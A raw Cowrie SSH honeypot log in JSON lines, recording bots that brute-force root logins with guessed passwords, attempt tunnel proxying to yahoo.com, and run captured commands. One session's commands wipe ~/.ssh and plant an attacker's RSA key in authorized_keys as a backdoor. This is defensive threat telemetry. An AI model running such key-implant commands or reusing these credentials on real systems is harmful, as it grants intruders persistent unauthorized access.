{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:53:59.441254Z","src_ip":"27.112.78.170","session":"7807e8e4e338"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:54:00.546567Z","src_ip":"27.112.78.170","session":"7807e8e4e338"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:54:00.813124Z","src_ip":"27.112.78.170","session":"d3d8a035cada"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:54:00.814325Z","src_ip":"27.112.78.170","session":"7807e8e4e338"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:54:31.599024Z","src_ip":"212.227.235.229","session":"56920371ecca"}
{"eventid":"cowrie.session.connect","src_ip":"45.159.112.103","src_port":59610,"dst_ip":"1.2.3.4","dst_port":22,"session":"eb590b727e8a","protocol":"ssh","message":"New connection: 45.159.112.103:59610 (1.2.3.4:22) [session: eb590b727e8a]","sensor":"my-vps","timestamp":"2025-08-26T00:54:37.978210Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:54:37.979001Z","src_ip":"45.159.112.103","session":"eb590b727e8a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:54:38.080437Z","src_ip":"45.159.112.103","session":"eb590b727e8a"}
{"eventid":"cowrie.login.success","username":"root","password":"123456.a","message":"login attempt [root/123456.a] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:54:38.525336Z","src_ip":"45.159.112.103","session":"eb590b727e8a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":25778,"dst_ip":"1.2.3.4","dst_port":22,"session":"16059f0d2975","protocol":"ssh","message":"New connection: 212.227.125.160:25778 (1.2.3.4:22) [session: 16059f0d2975]","sensor":"my-vps","timestamp":"2025-08-26T00:54:38.541752Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:54:38.542861Z","src_ip":"212.227.125.160","session":"16059f0d2975"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":26017,"dst_ip":"1.2.3.4","dst_port":22,"session":"bd99b16ce4a5","protocol":"ssh","message":"New connection: 212.227.125.160:26017 (1.2.3.4:22) [session: bd99b16ce4a5]","sensor":"my-vps","timestamp":"2025-08-26T00:54:38.657042Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T00:54:38.657894Z","src_ip":"212.227.125.160","session":"bd99b16ce4a5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:54:38.743590Z","src_ip":"45.159.112.103","session":"eb590b727e8a"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:54:38.744359Z","src_ip":"45.159.112.103","session":"eb590b727e8a"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:54:38.745305Z","src_ip":"45.159.112.103","session":"eb590b727e8a"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-26T00:54:38.773980Z","src_ip":"212.227.125.160","session":"bd99b16ce4a5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:54:38.847190Z","src_ip":"45.159.112.103","session":"eb590b727e8a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:54:39.200329Z","src_ip":"45.159.112.103","session":"eb590b727e8a"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T00:54:39.201315Z","src_ip":"45.159.112.103","session":"eb590b727e8a"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:54:39.205380Z","src_ip":"212.227.125.160","session":"bd99b16ce4a5"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T00:54:39.304901Z","src_ip":"45.159.112.103","session":"eb590b727e8a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:54:39.305913Z","src_ip":"45.159.112.103","session":"eb590b727e8a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.125.160","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-26T00:54:39.322120Z","session":"bd99b16ce4a5"}
{"eventid":"cowrie.session.connect","src_ip":"45.159.112.103","src_port":59616,"dst_ip":"1.2.3.4","dst_port":22,"session":"8ab20372aa6c","protocol":"ssh","message":"New connection: 45.159.112.103:59616 (1.2.3.4:22) [session: 8ab20372aa6c]","sensor":"my-vps","timestamp":"2025-08-26T00:54:39.423158Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:54:39.423983Z","src_ip":"45.159.112.103","session":"8ab20372aa6c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:54:39.534928Z","src_ip":"45.159.112.103","session":"8ab20372aa6c"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T00:54:40.020540Z","src_ip":"45.159.112.103","session":"8ab20372aa6c"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:54:41.133633Z","src_ip":"45.159.112.103","session":"8ab20372aa6c"}
{"eventid":"cowrie.session.connect","src_ip":"45.159.112.103","src_port":35878,"dst_ip":"1.2.3.4","dst_port":22,"session":"6867af168f3c","protocol":"ssh","message":"New connection: 45.159.112.103:35878 (1.2.3.4:22) [session: 6867af168f3c]","sensor":"my-vps","timestamp":"2025-08-26T00:54:41.248404Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:54:41.249280Z","src_ip":"45.159.112.103","session":"6867af168f3c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:54:41.365743Z","src_ip":"45.159.112.103","session":"6867af168f3c"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:54:41.869673Z","src_ip":"45.159.112.103","session":"6867af168f3c"}
{"eventid":"cowrie.session.closed","duration":"4.0","message":"Connection lost after 4.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:54:41.977847Z","src_ip":"45.159.112.103","session":"eb590b727e8a"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:54:41.986298Z","src_ip":"45.159.112.103","session":"6867af168f3c"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":49678,"dst_ip":"1.2.3.4","dst_port":22,"session":"0bbd1499d8da","protocol":"ssh","message":"New connection: 213.209.150.239:49678 (1.2.3.4:22) [session: 0bbd1499d8da]","sensor":"my-vps","timestamp":"2025-08-26T00:54:46.955013Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:54:46.955925Z","src_ip":"213.209.150.239","session":"0bbd1499d8da"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:54:47.002891Z","src_ip":"213.209.150.239","session":"0bbd1499d8da"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:54:47.238251Z","src_ip":"213.209.150.239","session":"0bbd1499d8da"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":15574,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:15574","sensor":"my-vps","timestamp":"2025-08-26T00:54:47.286794Z","session":"0bbd1499d8da"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:54:47.334131Z","src_ip":"213.209.150.239","session":"0bbd1499d8da"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":14191,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:14191","sensor":"my-vps","timestamp":"2025-08-26T00:54:47.469532Z","session":"0bbd1499d8da"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:54:47.516804Z","src_ip":"213.209.150.239","session":"0bbd1499d8da"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:54:47.565217Z","src_ip":"213.209.150.239","session":"0bbd1499d8da"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":49730,"dst_ip":"1.2.3.4","dst_port":22,"session":"4cf0c9c2af98","protocol":"ssh","message":"New connection: 213.209.150.239:49730 (1.2.3.4:22) [session: 4cf0c9c2af98]","sensor":"my-vps","timestamp":"2025-08-26T00:54:47.610985Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:54:47.611882Z","src_ip":"213.209.150.239","session":"4cf0c9c2af98"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:54:47.659332Z","src_ip":"213.209.150.239","session":"4cf0c9c2af98"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:54:47.894557Z","src_ip":"213.209.150.239","session":"4cf0c9c2af98"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":3073,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:3073","sensor":"my-vps","timestamp":"2025-08-26T00:54:47.943073Z","session":"4cf0c9c2af98"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:54:47.990655Z","src_ip":"213.209.150.239","session":"4cf0c9c2af98"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":12388,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:12388","sensor":"my-vps","timestamp":"2025-08-26T00:54:48.125544Z","session":"4cf0c9c2af98"}
